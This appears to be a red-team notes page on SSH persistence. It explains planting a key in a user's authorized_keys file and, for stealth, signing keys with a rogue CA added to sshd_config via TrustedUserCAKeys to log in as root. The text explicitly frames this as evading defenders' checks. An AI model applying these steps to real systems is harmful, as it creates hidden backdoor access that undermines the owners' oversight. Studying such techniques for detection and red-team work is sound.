Secondary Categories: 02-Persistence

Authorized Keys

When configuring SSH by default it allows a remote user to connect using a username and password, but what if that user changes their password? We can utilize SSH authorized keys file and place our SSH key on the ~/.ssh/authorized_keys file of the user to authenticate as that user.

Trusted User CA Keys

What if we want to be a little more stealth? Defenders will automatically check the au~/.ssh/authorized_keys file for anything suspicious… We can get around this by using a trusted user CA key to sign all our keys and sign in as any user.

# Create a key pair. This command will output two file the public key and private key
ssh-keygen -C CA -f ca

Next we need to configure the server with the newly created CA in the /etc/ssh/sshd_config

Copy the ca.pub and place it in /etc/ssh/ca.pub.

Edit the /etc/ssh/sshd_config to add the TrustedUserCAKeys /etc/ssh/ca.pub

Restart the SSH server

Then we need to generate a key for a user

ssh-keygen -t ecdsa

Now we need to sign the user key

# This command will sign our user key and output a file called id_ecdsa-cert.pub
ssh-keygen -s ca -I ap3x -n root -z 1 id_ecdsa.pub
 
# We can inspect the certiifcate using the following command
ssh-keygen -Lf id_ecdsa-cert.pub

Now we can SSH into any server that trust our CA key


Resources:

Also Check Out:

  • PLACEHOLDER